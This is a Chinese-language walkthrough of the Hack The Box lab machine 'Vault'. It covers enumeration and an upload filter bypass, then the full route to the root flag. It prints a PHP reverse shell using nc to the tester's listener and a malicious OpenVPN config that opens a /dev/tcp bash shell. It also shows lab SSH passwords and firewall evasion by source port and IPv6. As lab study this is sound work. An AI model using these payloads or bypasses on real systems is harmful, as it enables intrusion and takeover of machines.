【HTB系列】靶机Vault的渗透测试详解
- 2019 年 10 月 7 日
- 筆記
Kali: 10.10.14.213
靶机地址:10.10.10.109
先用nmap探测靶机
nmap -sC -sT -sV 10.10.10.109 |
---|
扫描结果如下:
![](https://ask.qcloudimg.com/http-save/5426480/s5pldzaewf.jpeg)
看看80端口有什么东西
![](https://ask.qcloudimg.com/http-save/5426480/lr2c4pt1rs.jpeg)
我们用gobuster进行探测下
gobuster -u http://10.10.10.109 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,php -o gobuster-sparklays -t 100 |
---|
扫了很久没有扫出什么东西
后来注意到这句话
We are proud to announce our first client: Sparklays (Sparklays.com still under construction)
尝试在Url后面加上/sparklay
~# gobuster -u http://10.10.10.109/sparklays -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,php -t 100 -o gobuster-sparklays |
---|
![](https://ask.qcloudimg.com/http-save/5426480/6pvr8h2osr.jpeg)
我们打开login.php
![](https://ask.qcloudimg.com/http-save/5426480/vjd6btjoke.jpeg)
打开下admin.php
![](https://ask.qcloudimg.com/http-save/5426480/l4ul7se5bo.jpeg)
尝试过绕过以及常见帐户密码
奇怪的是发现提交的帐户密码竟然是用GET方式,觉得很奇怪试着拦截登陆的数据包并放到sqlmap跑跑看,发现并没有注入点
sqlmap -r sparklays-admin-login.req –batch |
---|
![](https://ask.qcloudimg.com/http-save/5426480/ips58e2ovu.jpeg)
我们在打开design
![](https://ask.qcloudimg.com/http-save/5426480/ygg5b733b2.jpeg)
是Forbidden,那么这个目录下我们在gobuster下
gobuster -u http://10.10.10.109/sparklays/design -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,php -t 100 -o gobuster-sparklays-design |
---|
![](https://ask.qcloudimg.com/http-save/5426480/ql4cwkwwmx.jpeg)
打开upload.php
![](https://ask.qcloudimg.com/http-save/5426480/wh12wis6i8.jpeg)
打开design.html看看
![](https://ask.qcloudimg.com/http-save/5426480/y7ibb8sl0h.jpeg)
点【Change Logo】
![](https://ask.qcloudimg.com/http-save/5426480/19fzivgbqf.jpeg)
我们写一个反弹的shell进行上传
<?phpsystem('r, /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.213 1337 >/tmp/f');?> |
---|
被拒绝上传了
![](https://ask.qcloudimg.com/http-save/5426480/rtporsibzm.png)
我们来FUZZ下运行上传的后缀名看看能不能通过后缀名进行绕过
这里我用到这个字典:
https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/web-extensions.txt
![](https://ask.qcloudimg.com/http-save/5426480/br0mzadz52.png)
这里我用burp的intruder模块进行fuzz
![](https://ask.qcloudimg.com/http-save/5426480/esokqahf55.png)
发现php5是上传成功的,我们把shell改成shell.php5再次上传
![](https://ask.qcloudimg.com/http-save/5426480/l93c15ysx3.jpeg)
然后我们kali 开启监听1337端口
![](https://ask.qcloudimg.com/http-save/5426480/wgocc3shqx.png)
我们在访问
http://10.10.10.109/sparklays/design/uploads/shell.php5
然后就会得到一个shell
![](https://ask.qcloudimg.com/http-save/5426480/qht23o338w.png)
发现有2个用户
![](https://ask.qcloudimg.com/http-save/5426480/s0tm5cmbf4.png)
我在dave的Desktop目录下面看到一个ssh文件
![](https://ask.qcloudimg.com/http-save/5426480/xqoo8stszc.png)
Cat下得到一下内容
![](https://ask.qcloudimg.com/http-save/5426480/mb947ex9kf.png)
dave:Dav3therav3123
那么我们通过ssh连接到靶机上
![](https://ask.qcloudimg.com/http-save/5426480/94mx2nnfqi.jpeg)
我们在看看dave桌面上的其他文件
![](https://ask.qcloudimg.com/http-save/5426480/7xk5jdo2a9.png)
第一个key还不知道是什么意思就先留着。
第二个Servers应该是对应服务器的IP以及该服务器是什么
我们现在对DNS服务器进行扫描看看,但是靶机上面没有nmap 但是我们可以用nc当作端口扫描器
![](https://ask.qcloudimg.com/http-save/5426480/w6cpw4ga8m.jpeg)
![](https://ask.qcloudimg.com/http-save/5426480/nnqymlyypt.jpeg)
我们可以看到192.168.122.4开放了22和80端口。由于是内网的环境我们是无法访问到192.168.122.4的,所以我们需要做一个隧道把192.168.122.4的80端口映射到我们本地的1234端口
ssh -L 1234:192.168.122.4:80 [email protected] |
---|
![](https://ask.qcloudimg.com/http-save/5426480/iq23jpnc1p.jpeg)
![](https://ask.qcloudimg.com/http-save/5426480/axy4xznfdt.jpeg)
点击【Click here to modify your DNS Settings】
![](https://ask.qcloudimg.com/http-save/5426480/krop9n6x7c.jpeg)
发现是Not Found
点击【Click here to test your VPN Configuration】
![](https://ask.qcloudimg.com/http-save/5426480/d0ajo7ysuu.jpeg)
打开后是一个VPN配置信息,并允许我们测试我们的VPN
这里我找一遍关于如何用ovpn配置文件反弹shell的教程
https://medium.com/tenable-techblog/reverse-shell-from-an-openvpn-configuration-file-73fd8b1d38da
我们找下靶机的内网IP地址
![](https://ask.qcloudimg.com/http-save/5426480/rxvg0z7x9q.jpeg)
让靶机监听9002端口
![](https://ask.qcloudimg.com/http-save/5426480/mbm0yw0z72.png)
remote 192.168.122.1 nobind dev tun script-security 2 up "/bin/bash -c '/bin/bash -i > /dev/tcp/192.168.122.1/9002 0<&1 2>&1&'" |
---|
![](https://ask.qcloudimg.com/http-save/5426480/wvdd9bzocb.jpeg)
先点【Update file】然后再点【Test VPN】
就会得到一个shell
![](https://ask.qcloudimg.com/http-save/5426480/knkufmuge4.jpeg)
得到userflag
![](https://ask.qcloudimg.com/http-save/5426480/j33d99yxyq.jpeg)
接下来是获取root flag
我们在dave的目录里面找到一个ssh凭借
![](https://ask.qcloudimg.com/http-save/5426480/816ya2hh3y.png)
dave:dav3gerous567
我们直接通过ssh连接DNS服务器
![](https://ask.qcloudimg.com/http-save/5426480/pw4hnpyl86.jpeg)
我们尝试sudo -i切换为root,
![](https://ask.qcloudimg.com/http-save/5426480/y5faesmqdz.png)
但是目录里面没有我们想要的rootflag
![](https://ask.qcloudimg.com/http-save/5426480/2svjxahu7g.png)
之前我们注意到在dave的机器上有三台服务器,但是最后的The vault 是没有给出IP地址的,root flag可能就在那台机器上,所以我们需要去找线索
![](https://ask.qcloudimg.com/http-save/5426480/7xk5jdo2a9.png)
我们在DNS的hosts文件中找到了The vault的IP地址
![](https://ask.qcloudimg.com/http-save/5426480/ag03wn1ab7.png)
但是DNS服务器是无法ping通的
![](https://ask.qcloudimg.com/http-save/5426480/hkyhav9ds5.png)
但是DNS确实存在192.168.5.2的路由,猜测应该是禁止ping
![](https://ask.qcloudimg.com/http-save/5426480/3p8vph84nc.png)
后来发现DNS存在nmap 我们用nmap来进行端口探测
-Pn:表示默认主机在线,跳过主机发现
-v:显示详细信息
-n:不进行DNS解析
![](https://ask.qcloudimg.com/http-save/5426480/yt85vfmdee.jpeg)
发现2个端口都被closed,可能是真的关闭,但是也有可能是防火墙的原因
我们尝试使用nmap 的 –source-port参数
每个TCP数据包带有源端口号。默认情况下Nmap会随机选择一个可用的传出源端口来探测目标。该–source-port选项将强制Nmap使用指定的端口作为源端口。这种技术是利用了防火墙盲目地接受基于特定端口号的传入流量的弱点。端口21(FTP),端口53(DNS)和67(DHCP)是这种扫描类型的常见端口。 |
---|
![](https://ask.qcloudimg.com/http-save/5426480/bzpiqh65lx.jpeg)
发现一个987端口,我们用nc从本地的53端口进行连接
![](https://ask.qcloudimg.com/http-save/5426480/difsutm06p.png)
是openssh服务
对于这种防火墙我们可以尝试使用IPV6的规则绕过
先查看DNS服务器是否支持IPV6
![](https://ask.qcloudimg.com/http-save/5426480/yr4bsw6qtf.jpeg)
FF02::1指所有开启了IPv6组播的主机,和IGMP中的224.0.0.1对应
说明DNS服务器支持IPV6
我们在查找下DNS服务器的的 邻居
![](https://ask.qcloudimg.com/http-save/5426480/lc6ql6tlog.jpeg)
再看下DNS的路由和ip信息
![](https://ask.qcloudimg.com/http-save/5426480/nkj2h6v8y4.png)
![](https://ask.qcloudimg.com/http-save/5426480/o0f6kokque.jpeg)
我们可以看到192.168.5.0/24的流量都要通过ens3到192.168.122.5去
在192.168.155.5是防火墙的地址
![](https://ask.qcloudimg.com/http-save/5426480/7xk5jdo2a9.png)
我们在看DNS的邻居,发现还有3条IPV6,说明vault的IPV6应该在里面
我们在查看arp
![](https://ask.qcloudimg.com/http-save/5426480/4zoxnaoys4.png)
192.168.122.5对应的ipv6是fe80::5054:ff:fe3a:3bd5
下面这2条ipv6的地址就是 valut和firewall的
fe80::5054:ff:fec6:7066
fe80::5054:ff:fee1:7441
我们直接用nmap进行端口扫描,如果防火墙没有配置ipv6的规则的话如是valut的地址就会出现之前的987端口
![](https://ask.qcloudimg.com/http-save/5426480/10eucopnuv.jpeg)
这样我们就确定了fe80::5054:ff:fec6:7066是vault的IPV6地址,并且防火墙规则并没有阻拦ipv6的地址,同时我们的DNS服务器可以直接通过ipv6绕过防火墙跟vault进行通讯
那么我们直接ssh进行连接
![](https://ask.qcloudimg.com/http-save/5426480/i2mufmfiy5.jpeg)
密码跟之前的一样:dav3gerous567
![](https://ask.qcloudimg.com/http-save/5426480/cyq5ju44wd.jpeg)
![](https://ask.qcloudimg.com/http-save/5426480/mjeo4zgyh7.png)
![](https://ask.qcloudimg.com/http-save/5426480/7dj403wciz.png)
我们可以看到这个pgp的ID为D1EB1F03
我们看下vault系统是否存在密钥,不存在
![](https://ask.qcloudimg.com/http-save/5426480/5nowd30e03.png)
但是我们在dave@ubuntu上找到了
![](https://ask.qcloudimg.com/http-save/5426480/gg39zkc3nf.png)
所以我们需要把文件发送到dave@ubuntu进行解密
我们退回到dave@DNS上,利用scp将文件拷贝出来
scp -P 987 dave@[fe80::5054:ff:fec6:7066%ens3]:root* . |
---|
输入密码:dav3gerous567
![](https://ask.qcloudimg.com/http-save/5426480/jn3jhwlif2.jpeg)
![](https://ask.qcloudimg.com/http-save/5426480/ltmjfzw86h.png)
然后我们需要在把这个文件传送到dave@ubuntu上面
我们在ubuntu上面执行
![](https://ask.qcloudimg.com/http-save/5426480/7eivrnxggi.png)
然后在DNS上把文件传输过来
![](https://ask.qcloudimg.com/http-save/5426480/xwszm83u91.png)
这样文件就到了Ubuntu上面了
![](https://ask.qcloudimg.com/http-save/5426480/ojnwn87fh2.jpeg)
我们用md5sum来校验下文件的完整性
![](https://ask.qcloudimg.com/http-save/5426480/h0fzlxjvh5.png)
![](https://ask.qcloudimg.com/http-save/5426480/1x1or9wudh.png)
文件正常传输的
我们用gpg 解密下root.txt.gpg
![](https://ask.qcloudimg.com/http-save/5426480/h8dfns80ug.png)
要求我们输入密码
密码就是我们之前找到的key
![](https://ask.qcloudimg.com/http-save/5426480/vp39m2rbjg.png)
得到root flag
![](https://ask.qcloudimg.com/http-save/5426480/58qhj7xlbd.jpeg)